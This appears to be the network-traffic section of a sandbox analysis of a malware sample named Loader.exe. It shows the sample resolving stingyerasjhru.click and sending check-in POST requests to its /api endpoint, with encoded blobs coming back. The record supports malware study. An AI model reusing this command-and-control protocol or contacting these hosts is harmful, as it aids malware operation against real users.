                                                                                                              Dec 31, 2024 17:42:36.332381964 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.332441092 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.332571983 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.332587004 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.332978010 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.332986116 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.333031893 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.333038092 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.333076000 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.333081007 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.333270073 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.333276987 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.333493948 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.333507061 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.333684921 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.333698034 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.333874941 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.333887100 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.334037066 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.334050894 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.334232092 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.334240913 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.334441900 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.334455967 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.334600925 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.334615946 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.334785938 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.334794044 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.334954023 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.334959984 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.335146904 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.335159063 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.335338116 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.335355997 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.335566044 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.335583925 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.335750103 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.335763931 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.335901976 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.335908890 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.336057901 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.336064100 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.336253881 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.336261988 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.336442947 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.336451054 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.336666107 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.336679935 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.336859941 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.337049961 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.337213039 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.337414026 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.337630033 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.338161945 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.338349104 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.338541985 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.338752985 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.338942051 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.339133978 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.339309931 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.339472055 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.339695930 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.382205009 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.382906914 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.382921934 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.383091927 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.383099079 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.383275032 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.383282900 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.383449078 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.383455992 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.383611917 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.383619070 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.383805990 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.383811951 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:36.384098053 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.384289026 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.384481907 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.384594917 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.384764910 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.384957075 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.385251045 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:36.426207066 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:40.424493074 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:40.424849987 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:40.425137997 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:40.425271988 CET49761443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:40.425323009 CET44349761172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:40.466042042 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:40.466125011 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:40.466264963 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:40.466489077 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:40.466527939 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:40.735467911 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:40.735774994 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:40.736583948 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:40.736593962 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:40.736828089 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:40.737884998 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:40.737884998 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:40.737938881 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.414177895 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.414453983 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.414583921 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.414644957 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:41.414676905 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.414695978 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.414860964 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.414961100 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.415030003 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:41.415030003 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:41.415047884 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.415071011 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.415220976 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:41.415261030 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.415549994 CET44349762172.67.157.249192.168.11.20
                                                                                                              Dec 31, 2024 17:42:41.415581942 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:41.415800095 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:41.415800095 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:41.415800095 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:41.714801073 CET49762443192.168.11.20172.67.157.249
                                                                                                              Dec 31, 2024 17:42:41.714812994 CET44349762172.67.157.249192.168.11.20
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 31, 2024 17:42:27.392051935 CET5246453192.168.11.201.1.1.1
                                                                                                              Dec 31, 2024 17:42:27.528168917 CET53524641.1.1.1192.168.11.20
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 31, 2024 17:42:27.392051935 CET192.168.11.201.1.1.10xfa0aStandard query (0)stingyerasjhru.clickA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 31, 2024 17:42:27.528168917 CET1.1.1.1192.168.11.200xfa0aNo error (0)stingyerasjhru.click172.67.157.249A (IP address)IN (0x0001)false
                                                                                                              Dec 31, 2024 17:42:27.528168917 CET1.1.1.1192.168.11.200xfa0aNo error (0)stingyerasjhru.click104.21.58.80A (IP address)IN (0x0001)false
                                                                                                              • stingyerasjhru.click
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.11.2049755172.67.157.2494431980C:\Users\user\Desktop\Loader.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 16:42:27 UTC267OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: stingyerasjhru.click
                                                                                                              2024-12-31 16:42:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2024-12-31 16:42:28 UTC1135INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 16:42:28 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=u2f9uee89qke9t8oa3esj3a9u1; expires=Sat, 26 Apr 2025 10:29:07 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVX8rc3ePG51eFC5NEDxF92jfgNzg43CzSrDvkPBQ26HZiumNx0keblUy4NEGjSM%2BFDoxeGIrE8ohbnoroIJQJvuT8pxg0vX%2BYGgePSx908n3AGxZ0wCVKYkWiV5pkSTEXgiQEJHmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fabb9153e65744a-MIA
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=128878&min_rtt=128776&rtt_var=27331&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2853&recv_bytes=911&delivery_rate=29655&cwnd=241&unsent_bytes=0&cid=b761e8ffd5c24818&ts=686&x=0"
                                                                                                              2024-12-31 16:42:28 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-31 16:42:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.11.2049756172.67.157.2494431980C:\Users\user\Desktop\Loader.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-31 16:42:28 UTC268OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 50
                                                                                                              Host: stingyerasjhru.click
                                                                                                              2024-12-31 16:42:28 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 26 6a 3d
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=pqZnKP--Z2xsZXhl&j=
                                                                                                              2024-12-31 16:42:29 UTC1141INHTTP/1.1 200 OK
                                                                                                              Date: Tue, 31 Dec 2024 16:42:29 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=ojbh1nud2vrpropo3e3s8guul2; expires=Sat, 26 Apr 2025 10:29:08 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0KZrbIO9dwgg8P3tRWV52CPdDI6DejHjw77OtADcUl9qRFsIE2%2FVOvYdzqWMZDu5G6SMaxKlphAM0E%2Fibp7%2Byz2XDN2239i0iIFB3U9ZU7kfQqweSrQgwCmz7Ps%2BZkNtEBs9Zo%2B56A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fabb91b288031e9-MIA
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=129260&min_rtt=129132&rtt_var=27444&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2853&recv_bytes=954&delivery_rate=29553&cwnd=241&unsent_bytes=0&cid=4397af3cf13175bb&ts=730&x=0"
                                                                                                              2024-12-31 16:42:29 UTC228INData Raw: 34 39 39 34 0d 0a 74 37 2b 70 2b 77 49 67 6e 48 76 6b 6e 43 59 5a 68 68 74 4e 66 75 4a 6e 48 61 42 35 73 6d 58 6e 61 74 5a 76 4a 73 58 6f 7a 56 6e 4d 6e 64 2f 5a 4f 42 53 77 57 5a 66 35 42 43 50 79 61 54 67 62 7a 6b 56 38 78 46 75 49 41 34 59 47 70 51 6f 4b 35 35 36 67 65 34 33 5a 79 4a 64 78 52 62 42 5a 67 65 51 45 49 39 31 67 62 78 75 4d 52 53 65 43 48 4e 67 48 68 67 61 30 44 6b 32 71 6d 4b 45 36 33 39 50 4f 6b 32 64 44 2b 42 71 49 38 55 4e 38 34 33 6f 6e 45 49 73 4b 64 63 31 62 6e 6b 65 43 45 50 52 56 42 49 69 4e 75 54 6a 36 33 74 71 51 49 46 32 77 41 4d 62 35 53 44 75 38 4f 53 77 62 67 41 74 37 78 42 4c 61 44 59 38 4f 74 51 74 4d 74 59 47 72 4d 64 2f 64 7a 5a 4a 74 53 75
                                                                                                              Data Ascii: 4994t7+p+wIgnHvknCYZhhtNfuJnHaB5smXnatZvJsXozVnMnd/ZOBSwWZf5BCPyaTgbzkV8xFuIA4YGpQoK556ge43ZyJdxRbBZgeQEI91gbxuMRSeCHNgHhga0Dk2qmKE639POk2dD+BqI8UN843onEIsKdc1bnkeCEPRVBIiNuTj63tqQIF2wAMb5SDu8OSwbgAt7xBLaDY8OtQtMtYGrMd/dzZJtSu
                                                                                                              2024-12-31 16:42:29 UTC1369INData Raw: 77 58 67 76 5a 49 65 75 6c 36 62 31 4c 41 41 6d 65 43 51 35 42 55 74 77 75 6c 48 46 47 71 6d 71 6c 37 79 70 50 53 32 57 64 4f 76 6b 48 47 39 6b 68 31 34 58 6f 67 47 34 45 46 62 63 30 62 30 77 2b 4e 44 4c 34 43 53 36 69 45 70 54 7a 64 31 4d 79 57 5a 30 72 34 46 6f 57 2b 43 6a 76 6a 59 57 39 45 77 43 56 76 77 52 6a 45 43 70 52 49 71 30 4e 64 35 34 32 6a 65 34 32 64 7a 5a 64 68 54 2f 34 4c 6a 76 56 50 66 76 5a 79 4a 68 47 4e 42 58 4c 49 46 4e 4d 48 67 67 4b 2b 41 6b 36 6a 68 36 49 39 31 64 32 4c 31 79 42 46 35 6c 6e 65 76 6d 64 2b 39 48 34 6a 43 73 49 2f 50 39 31 56 79 55 65 43 42 50 52 56 42 4b 2b 50 72 44 6a 65 30 73 69 52 61 31 44 2b 43 34 44 7a 51 57 6e 69 66 43 45 57 67 78 64 31 7a 42 33 54 44 6f 34 42 73 51 70 41 35 38 54 76 50 4d 32 64 6b 39 6c 42 54
                                                                                                              Data Ascii: wXgvZIeul6b1LAAmeCQ5BUtwulHFGqmql7ypPS2WdOvkHG9kh14XogG4EFbc0b0w+NDL4CS6iEpTzd1MyWZ0r4FoW+CjvjYW9EwCVvwRjECpRIq0Nd542je42dzZdhT/4LjvVPfvZyJhGNBXLIFNMHggK+Ak6jh6I91d2L1yBF5lnevmd+9H4jCsI/P91VyUeCBPRVBK+PrDje0siRa1D+C4DzQWnifCEWgxd1zB3TDo4BsQpA58TvPM2dk9lBT
                                                                                                              2024-12-31 16:42:29 UTC1369INData Raw: 39 51 48 72 75 61 7a 30 63 6a 42 64 7a 79 42 33 66 43 6f 6c 49 2b 6b 31 44 76 38 72 33 65 2f 2f 65 33 35 70 71 41 4d 73 61 69 50 42 44 62 61 52 6d 59 51 58 41 41 6e 4f 43 51 35 41 4b 68 41 43 79 48 30 75 71 69 61 45 31 32 74 6a 45 6b 57 42 43 38 78 79 43 39 55 39 34 36 58 30 39 46 6f 41 4e 65 73 4d 52 32 6b 66 4c 53 4c 4d 56 42 50 2f 4b 6e 69 7a 65 6e 2f 36 61 62 6b 7a 35 44 38 62 68 43 6d 4b 6b 66 69 4e 63 32 45 56 79 79 68 37 56 43 49 51 43 75 67 68 4f 71 34 4b 68 4f 4d 66 53 7a 35 6c 73 53 76 51 55 69 50 70 4d 63 75 39 79 4b 52 79 42 44 7a 2b 4d 57 39 63 66 78 56 44 30 4f 55 4f 72 68 36 42 35 34 4e 37 46 6c 32 64 55 76 67 62 49 35 77 52 38 36 44 6c 33 58 49 77 4d 66 38 6b 52 31 41 65 43 42 62 45 4f 51 36 53 48 71 44 48 62 32 73 2b 56 61 55 2f 34 47 59
                                                                                                              Data Ascii: 9QHruaz0cjBdzyB3fColI+k1Dv8r3e//e35pqAMsaiPBDbaRmYQXAAnOCQ5AKhACyH0uqiaE12tjEkWBC8xyC9U946X09FoANesMR2kfLSLMVBP/Knizen/6abkz5D8bhCmKkfiNc2EVyyh7VCIQCughOq4KhOMfSz5lsSvQUiPpMcu9yKRyBDz+MW9cfxVD0OUOrh6B54N7Fl2dUvgbI5wR86Dl3XIwMf8kR1AeCBbEOQ6SHqDHb2s+VaU/4GY
                                                                                                              2024-12-31 16:42:29 UTC1369INData Raw: 2f 44 6c 33 58 49 73 77 63 64 52 62 7a 30 6d 63 53 4c 4d 42 42 50 2f 4b 70 6a 4c 48 30 38 57 51 62 55 54 32 48 6f 6a 7a 54 33 33 76 66 69 67 61 6a 51 31 79 78 78 6a 52 41 34 38 61 74 77 5a 4f 71 6f 44 76 64 5a 58 61 30 39 6b 34 41 74 6b 56 72 2b 35 66 61 66 49 35 4d 46 4b 5a 52 58 6a 4f 57 34 68 48 68 67 65 39 41 6b 79 76 68 61 41 2f 32 39 76 4e 6c 47 56 4e 39 41 75 4f 38 45 6c 77 36 33 49 39 48 49 30 42 63 38 59 54 32 77 33 46 52 76 51 4b 58 4f 66 53 37 77 37 59 30 73 75 61 64 67 4c 68 56 35 2b 2b 51 33 65 6b 49 57 38 51 6a 67 56 77 7a 68 66 62 44 34 51 45 75 67 70 42 72 6f 4b 6e 4b 64 54 5a 77 35 68 75 54 66 38 64 67 2f 74 41 66 4f 42 2f 49 46 7a 4f 52 58 6a 61 57 34 68 48 71 69 2b 42 54 32 57 64 79 72 42 31 7a 4a 33 4d 6c 53 41 61 76 68 57 46 38 6b 78
                                                                                                              Data Ascii: /Dl3XIswcdRbz0mcSLMBBP/KpjLH08WQbUT2HojzT33vfigajQ1yxxjRA48atwZOqoDvdZXa09k4AtkVr+5fafI5MFKZRXjOW4hHhge9AkyvhaA/29vNlGVN9AuO8Elw63I9HI0Bc8YT2w3FRvQKXOfS7w7Y0suadgLhV5++Q3ekIW8QjgVwzhfbD4QEugpBroKnKdTZw5huTf8dg/tAfOB/IFzORXjaW4hHqi+BT2WdyrB1zJ3MlSAavhWF8kx
                                                                                                              2024-12-31 16:42:29 UTC1369INData Raw: 42 44 41 58 54 2f 49 45 4e 51 45 67 51 32 37 44 45 57 68 6d 4b 67 79 78 39 50 47 6c 6d 68 4b 39 78 69 43 2b 30 6c 39 36 48 4d 75 47 34 34 4c 64 34 4a 56 6b 41 43 64 53 4f 78 4e 5a 62 65 52 76 53 33 59 2f 4d 61 57 49 46 32 77 41 4d 62 35 53 44 75 38 4f 53 59 4f 68 41 68 74 79 78 7a 65 43 49 59 61 74 51 42 50 74 59 32 67 50 39 4c 52 7a 5a 5a 6d 51 2f 73 54 69 76 6c 42 63 4f 74 31 62 31 4c 41 41 6d 65 43 51 35 41 70 6a 68 75 6a 44 6b 71 73 6e 4c 52 37 79 70 50 53 32 57 64 4f 76 6b 48 47 2f 55 39 77 34 48 6b 6a 48 49 51 49 66 39 41 55 31 77 43 4d 41 36 59 48 51 36 43 42 70 7a 44 61 32 39 6d 56 62 6c 44 37 43 35 53 2b 43 6a 76 6a 59 57 39 45 77 44 4e 34 30 67 76 54 52 62 51 65 74 78 74 50 71 6f 62 76 4a 4a 76 45 69 35 35 73 41 71 5a 5a 67 50 46 4e 65 4f 74 34
                                                                                                              Data Ascii: BDAXT/IENQEgQ27DEWhmKgyx9PGlmhK9xiC+0l96HMuG44Ld4JVkACdSOxNZbeRvS3Y/MaWIF2wAMb5SDu8OSYOhAhtyxzeCIYatQBPtY2gP9LRzZZmQ/sTivlBcOt1b1LAAmeCQ5ApjhujDkqsnLR7ypPS2WdOvkHG/U9w4HkjHIQIf9AU1wCMA6YHQ6CBpzDa29mVblD7C5S+CjvjYW9EwDN40gvTRbQetxtPqobvJJvEi55sAqZZgPFNeOt4
                                                                                                              2024-12-31 16:42:29 UTC1369INData Raw: 4a 6e 67 6b 4f 51 50 34 34 47 68 67 35 66 35 35 58 68 49 70 58 61 78 39 6b 34 41 76 30 65 68 66 39 4f 63 75 68 32 4b 42 69 53 44 33 6a 51 47 74 45 4d 69 41 53 30 41 45 6d 74 69 36 59 32 32 64 44 4d 6e 6d 39 48 76 6c 66 47 2b 56 77 37 76 44 6b 4f 45 59 73 4a 4a 4a 68 62 7a 30 6d 63 53 4c 4d 42 42 50 2f 4b 72 7a 48 51 31 38 61 61 62 30 48 73 47 49 44 73 52 48 62 75 61 79 55 58 68 51 68 79 7a 78 6a 57 41 59 34 45 70 67 52 45 70 49 48 76 64 5a 58 61 30 39 6b 34 41 74 30 4f 6b 50 52 44 64 2f 4a 79 4c 68 2b 57 43 47 2b 43 56 5a 41 57 67 68 6e 30 56 56 4b 33 6e 61 67 6b 6d 38 53 4c 6e 6d 77 43 70 6c 6d 41 39 30 4a 38 34 6e 63 39 47 59 59 4b 63 4d 73 53 31 41 2b 47 43 4c 41 4a 51 36 4b 4a 6f 7a 44 53 33 73 53 64 61 55 7a 33 46 73 61 77 42 48 7a 38 4f 58 64 63 6f
                                                                                                              Data Ascii: JngkOQP44Ghg5f55XhIpXax9k4Av0ehf9Ocuh2KBiSD3jQGtEMiAS0AEmti6Y22dDMnm9HvlfG+Vw7vDkOEYsJJJhbz0mcSLMBBP/KrzHQ18aab0HsGIDsRHbuayUXhQhyzxjWAY4EpgREpIHvdZXa09k4At0OkPRDd/JyLh+WCG+CVZAWghn0VVK3nagkm8SLnmwCplmA90J84nc9GYYKcMsS1A+GCLAJQ6KJozDS3sSdaUz3FsawBHz8OXdco
                                                                                                              2024-12-31 16:42:29 UTC1369INData Raw: 56 33 51 61 58 43 37 31 4e 43 75 65 4e 74 33 75 4e 6e 65 75 53 64 6b 66 35 44 38 54 4c 52 33 58 71 66 6a 6c 63 6e 7a 6f 78 67 68 54 4b 52 39 30 78 72 55 31 44 71 38 72 33 65 38 44 61 79 35 35 36 56 50 6b 56 6c 2f 56 4a 64 38 5a 32 4b 41 71 44 43 6e 7a 54 45 70 77 4d 69 45 6a 36 54 55 4f 2f 79 76 64 37 2b 74 72 64 6d 6b 39 42 37 78 44 47 73 41 52 38 38 6a 6c 33 58 4c 35 46 62 63 45 4c 30 77 69 55 4e 76 52 56 58 5a 6e 4b 70 43 33 53 7a 63 69 50 61 30 2f 79 43 4c 69 2b 48 43 2b 32 4b 33 31 4f 30 68 6f 2f 33 53 53 65 52 34 52 49 37 44 52 64 35 35 7a 76 59 34 65 54 69 34 73 67 47 72 35 65 68 65 78 57 66 65 64 76 4c 46 75 2b 4f 31 6a 55 45 64 63 58 67 68 2b 37 54 51 72 6e 68 65 39 6a 37 4a 33 43 6e 6e 74 54 36 42 53 57 2b 51 52 45 71 6a 6b 33 58 4e 68 46 53 73
                                                                                                              Data Ascii: V3QaXC71NCueNt3uNneuSdkf5D8TLR3XqfjlcnzoxghTKR90xrU1Dq8r3e8Day556VPkVl/VJd8Z2KAqDCnzTEpwMiEj6TUO/yvd7+trdmk9B7xDGsAR88jl3XL5FbcEL0wiUNvRVXZnKpC3SzciPa0/yCLi+HC+2K31O0ho/3SSeR4RI7DRd55zvY4eTi4sgGr5ehexWfedvLFu+O1jUEdcXgh+7TQrnhe9j7J3CnntT6BSW+QREqjk3XNhFSs
